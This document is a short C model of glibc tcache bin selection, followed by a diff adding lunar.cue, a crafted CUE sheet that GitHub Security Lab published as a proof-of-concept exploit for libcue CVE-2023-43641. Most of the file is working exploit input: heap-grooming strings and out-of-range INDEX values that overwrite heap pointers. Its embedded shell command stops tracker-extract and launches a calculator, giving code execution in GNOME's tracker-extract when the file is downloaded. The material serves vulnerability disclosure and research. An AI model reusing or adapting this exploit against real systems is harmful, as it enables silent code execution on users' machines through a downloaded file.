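```c
/* Minimal model (not glibc source) of how a string's length selects a
 * tcache bin on x86-64 glibc: the payload plus an 8-byte size field is
 * rounded up to a 16-byte-aligned chunk, and each 0x10 size step gets
 * its own tcache bin. */
#include <stdio.h>

#define MINSIZE   0x20u  /* smallest chunk glibc hands out */
#define ALIGNMENT 0x10u  /* chunk sizes step in units of 0x10 */

static unsigned request2chunksize(unsigned req) {
    unsigned sz = req + 8;  /* payload + size field */
    if (sz < MINSIZE) sz = MINSIZE;
    return (sz + ALIGNMENT - 1) & ~(ALIGNMENT - 1);
}

static unsigned chunksize2tidx(unsigned csz) {
    return (csz - MINSIZE) / ALIGNMENT;  /* mirrors glibc's csize2tidx */
}

int main(void) {
    /* TRACK 000 of lunar.cue (below) notes that its 251-character
     * MESSAGE lands in tcache index 15: strdup copies 252 bytes
     * including the NUL, which becomes a 0x110-byte chunk. */
    unsigned csz = request2chunksize(251 + 1);
    printf("chunk size 0x%x -> tcache index %u\n", csz, chunksize2tidx(csz));
    return 0;
}
```

Running it prints `chunk size 0x110 -> tcache index 15`, which is why the PoC's strings are padded to such specific lengths.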
diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/lunar.cue b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/lunar.cue
new file mode 100644
index 0000000..ee649bf
--- /dev/null
+++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/lunar.cue
@@ -0,0 +1,44691 @@
+PERFORMER Kev
+TITLE "Kev'z Warez"
+FILE pwned.mp3 MP3
+
+TRACK 000 AUDIO
+MESSAGE "First some [heap feng shui](https://en.wikipedia.org/wiki/Heap_feng_shui):
+allocate memory so that all subsequent allocations come from a contiguous block of
+memory. For example, this string is 251 characters long to use a chunk from tcache
+index 15."
+TRACK 001 AUDIO
+TITLE "A Track is 0x3a8 bytes, so creating many new tracks is a quick way to use lots of memory."
+TRACK 002 AUDIO
+TITLE "Again "
+TRACK 003 AUDIO
+TITLE "Again "
+TRACK 004 AUDIO
+TITLE "Again "
+TRACK 005 AUDIO
+TITLE "Again "
+TRACK 006 AUDIO
+TITLE "Again "
+TRACK 007 AUDIO
+TITLE "Again "
+TRACK 008 AUDIO
+TITLE "Again "
+TRACK 009 AUDIO
+TITLE "Again "
+TRACK 010 AUDIO
+TITLE "Again "
+TRACK 011 AUDIO
+TITLE "Again "
+TRACK 012 AUDIO
+TITLE "Again "
+TRACK 013 AUDIO
+TITLE "Again "
+TRACK 014 AUDIO
+TITLE "Again "
+TRACK 015 AUDIO
+TITLE "Again "
+TRACK 016 AUDIO
+TITLE "Again "
+TRACK 017 AUDIO
+TITLE "Again "
+TRACK 018 AUDIO
+TITLE "Again "
+TRACK 019 AUDIO
+TITLE "Again "
+TRACK 020 AUDIO
+TITLE "Again "
+TRACK 021 AUDIO
+TITLE "Again "
+TRACK 022 AUDIO
+TITLE "Again "
+TRACK 023 AUDIO
+TITLE "Again "
+TRACK 024 AUDIO
+TITLE "Again "
+TRACK 025 AUDIO
+TITLE "Again "
+TRACK 026 AUDIO
+TITLE "Again "
+TRACK 027 AUDIO
+TITLE "Again "
+TRACK 028 AUDIO
+TITLE "Again "
+TRACK 029 AUDIO
+TITLE "Again "
+TRACK 030 AUDIO
+TITLE "Again "
+TRACK 031 AUDIO
+TITLE "Again "
+TRACK 032 AUDIO
+TITLE "Again "
+
+TRACK 033 AUDIO
+TITLE "Heap Feng Shui: empty the tcache"
+COMPOSER "Allocate a chunk from tcache index 2 "
+ARRANGER "Allocate a chunk from tcache index 4 "
+PERFORMER "Allocate a chunk from tcache index 6
+ "
+SONGWRITER "Allocate a chunk from tcache index 7
+ "
+GENRE "Allocate a chunk from tcache index 11
+
+ "
+MESSAGE "The goal here is to ensure that all subsequent allocations come
+from a large contiguous block of memory. This string allocates a chunk from
+tcache index 13. Doing this 14 times guarantees that the tcache is empty. "
+
+TRACK 034 AUDIO
+TITLE "Copyright (c) 2023 GitHub, Inc."
+COMPOSER "[GitHub Security Lab](https://securitylab.github.com/)"
+ARRANGER "
+This version of the poc is tuned for Ubuntu 23.04 (Lunar Lobster)
+"
+PERFORMER "[Kevin Backhouse](https://github.com/kevinbackhouse)
+ "
+SONGWRITER "
+ "
+GENRE "[The Malloc Maleficarum](https://seclists.org/bugtraq/2005/Oct/118).
+See also: [how2heap](https://github.com/shellphish/how2heap).
+ "
+MESSAGE "Proof-of-concept exploit for libcue CVE-2023-43641 (GHSL-2023-197): out of bounds
+array access in track_set_index. The vulnerability is used to get code execution in GNOME's
+tracker-extract. Download this file to pop a calc."
+
+TRACK 035 AUDIO
+TITLE "Never Gonna Give You Up "
+COMPOSER "Rick Astley "
+ARRANGER " "
+PERFORMER "
+We're no strangers to love
+You know the rules and so do I
+ "
+SONGWRITER "
+A full commitment's what I'm thinking of
+You wouldn't get this from any other guy
+ "
+GENRE "
+I just want to tell you how I'm feeling
+Gotta make you understand
+
+ "
+MESSAGE "
+Never gonna give you up, never gonna let you down
+Never gonna run around and desert you
+Never gonna make you cry, never gonna say goodbye
+Never gonna tell a lie and hurt you
+ "
+TRACK 036 AUDIO
+TITLE "Repeat Heap Feng Shui "
+COMPOSER " "
+ARRANGER " "
+PERFORMER "
+ "
+SONGWRITER "
+ "
+GENRE "
+
+ "
+MESSAGE "
+
+ "
+TRACK 037 AUDIO
+TITLE "Repeat Heap Feng Shui "
+COMPOSER " "
+ARRANGER " "
+PERFORMER "
+ "
+SONGWRITER "
+ "
+GENRE "
+
+ "
+MESSAGE "
+
+ "
+TRACK 038 AUDIO
+TITLE "Repeat Heap Feng Shui "
+COMPOSER " "
+ARRANGER " "
+PERFORMER "
+ "
+SONGWRITER "
+ "
+GENRE "
+
+ "
+MESSAGE "
+
+ "
+TRACK 039 AUDIO
+TITLE "Repeat Heap Feng Shui "
+COMPOSER " "
+ARRANGER " "
+PERFORMER "
+ "
+SONGWRITER "
+ "
+GENRE "
+
+ "
+MESSAGE "
+
+ "
+TRACK 040 AUDIO
+TITLE "Repeat Heap Feng Shui "
+COMPOSER " "
+ARRANGER " "
+PERFORMER "
+ "
+SONGWRITER "
+ "
+GENRE "
+
+ "
+MESSAGE "
+
+ "
+TRACK 041 AUDIO
+TITLE "Repeat Heap Feng Shui "
+COMPOSER " "
+ARRANGER " "
+PERFORMER "
+ "
+SONGWRITER "
+ "
+GENRE "
+
+ "
+MESSAGE "
+
+ "
+TRACK 042 AUDIO
+TITLE "Repeat Heap Feng Shui "
+COMPOSER " "
+ARRANGER " "
+PERFORMER "
+ "
+SONGWRITER "
+ "
+GENRE "
+
+ "
+MESSAGE "
+
+ "
+TRACK 043 AUDIO
+TITLE "Repeat Heap Feng Shui "
+COMPOSER " "
+ARRANGER " "
+PERFORMER "
+ "
+SONGWRITER "
+ "
+GENRE "
+
+ "
+MESSAGE "
+
+ "
+TRACK 044 AUDIO
+TITLE "Repeat Heap Feng Shui "
+COMPOSER " "
+ARRANGER " "
+PERFORMER "
+ "
+SONGWRITER "
+ "
+GENRE "
+
+ "
+MESSAGE "
+
+ "
+TRACK 045 AUDIO
+TITLE "Repeat Heap Feng Shui "
+COMPOSER " "
+ARRANGER " "
+PERFORMER "
+ "
+SONGWRITER "
+ "
+GENRE "
+
+ "
+MESSAGE "
+
+ "
+TRACK 046 AUDIO
+TITLE "Repeat Heap Feng Shui "
+COMPOSER " "
+ARRANGER " "
+PERFORMER "
+ "
+SONGWRITER "
+ "
+GENRE "
+
+ "
+MESSAGE "
+
+ "
+TRACK 047 AUDIO
+TITLE "for freeing to tcache index 1"
+TITLE "free previous title"
+INDEX 4294964432 4294958312
+TRACK 048 AUDIO
+TITLE "Allocate previously freed string"
+INDEX 4294967268 149
+INDEX 4294964250 4294958324
+TITLE "long string to overwrite low bytes of address ð "
+INDEX 4294955254 69
+FILE pwned.mp3 MP3
+GENRE "set low bytes of info->file P "
+TITLE "long string to overwrite low bytes of address 0 "
+INDEX 4294955262 53
+FILE pwned.mp3 MP3
+PERFORMER "set low bytes of file->g_class Ð "
+INDEX 4294955259 0
+TITLE "long string to overwrite low bytes of address "
+INDEX 4294955322 85
+FILE pwned.mp3 MP3
+TITLE "long string to overwrite low bytes of address ° "
+INDEX 4294955150 69
+FILE pwned.mp3 MP3
+TITLE "long string to overwrite low bytes of address "
+INDEX 4294955292 277
+FILE pwned.mp3 MP3
+MESSAGE "set low bytes of tcache->entries[15] `"
+MESSAGE "kevwozere"
+TITLE "long string to overwrite low bytes of address Ð "
+INDEX 4294955282 85
+FILE pwned.mp3 MP3
+TITLE "long string to overwrite low bytes of address à "
+INDEX 4294955284 949
+FILE pwned.mp3 MP3
+TITLE "long string to overwrite low bytes of address 0"
+INDEX 4294955294 949
+FILE pwned.mp3 MP3
+TITLE "long title to allocate 0x110-sized chunk.
" +TRACK 049 AUDIO +INDEX 4294967243 0 +INDEX 4294967247 1 +INDEX 4294967254 0 +INDEX 4294967255 0 +TRACK 050 AUDIO +TITLE "Overwrite low bytes of track->file.name `" +INDEX 4294967294 277 +FILE "wen poc?" MP3 +TITLE "Overwrite low bytes of track->file.name à" +INDEX 14 949 +FILE pwned.mp3 MP3 +TITLE "Overwrite low bytes of track->file.name 0" +INDEX 24 949 +FILE pwned.mp3 MP3 +TITLE "Overwrite low bytes of track->file.name ° " +INDEX 4294967272 53 +FILE pwned.mp3 MP3 +INDEX 0 4294967295 +INDEX 1 0 +INDEX 1 1892336 +INDEX 14 0 +TRACK 051 AUDIO +FLAGS +TRACK 052 AUDIO +ISRC looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooog-string-to-allocate-0x110-sized-chunk +TITLE "long title to overwrite low bytes of track->isrc `" +INDEX 4294967294 277 +ISRC short-string +INDEX 0 4294967295 +INDEX 1 0 +INDEX 1 242320 +INDEX 4294967088 0 +INDEX 4294967090 0 +INDEX 4294967271 100 +INDEX 4294967273 0 +INDEX 4294967280 80 +TRACK 053 AUDIO +INDEX 4294963806 4294958357 +TRACK 054 AUDIO +INDEX 4294967279 0 +INDEX 4294963634 4294958317 +TRACK 055 AUDIO +INDEX 4294967282 0 +INDEX 4294963462 3817 +TITLE "Temporary long title for tcache index 6 " +TITLE "short title" +TRACK 056 AUDIO +TITLE "Use long title from tcache index 6 " +INDEX 4294967258 197 +TITLE " /bin/bash" +INDEX 4294963270 3818 +TRACK 057 AUDIO +INDEX 4294967279 25389 +INDEX 4294963098 3819 +TITLE "Temporary long title for tcache index 6 " +TITLE "eta son" +TRACK 058 AUDIO +TITLE "Use long title from tcache index 6 " +INDEX 4294967258 357 +TITLE "This command is going to get called repeatedly in an infinite loop, so send SIGSTOP to avoid a fork-bomb and use flock so only one calculator starts. 
+killall -SIGSTOP tracker-extract-3; flock -w 3 ~/Downloads/pwned.lock -c 'gnome-calculator -e 1337' && (sleep 10; rm ~/Downloads/pwned.lock; killall -9 tracker-extract-3)"
+INDEX 4294962906 4294958329
+PERFORMER "Temporary long name for tcache index 6 "
+PERFORMER "short name"
+TRACK 059 AUDIO
+INDEX 4294962714 4566
+TITLE "Use chunk from tcache index 6 "
+INDEX 4294967258 197
+TITLE "short title"
+TRACK 060 AUDIO
+INDEX 4294962538 4565
+TITLE " Ð "
+TRACK 1337 AUDIO
+INDEX 4294967290 0
+TITLE "Use the chunk that is still in tcache index 2"
+MESSAGE "pop that calc  "
+REM DATE "1992 AD"
[... the remaining added lines of lunar.cue (whitespace-only heap-grooming padding, through line 44691 of the file) elided ...]
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
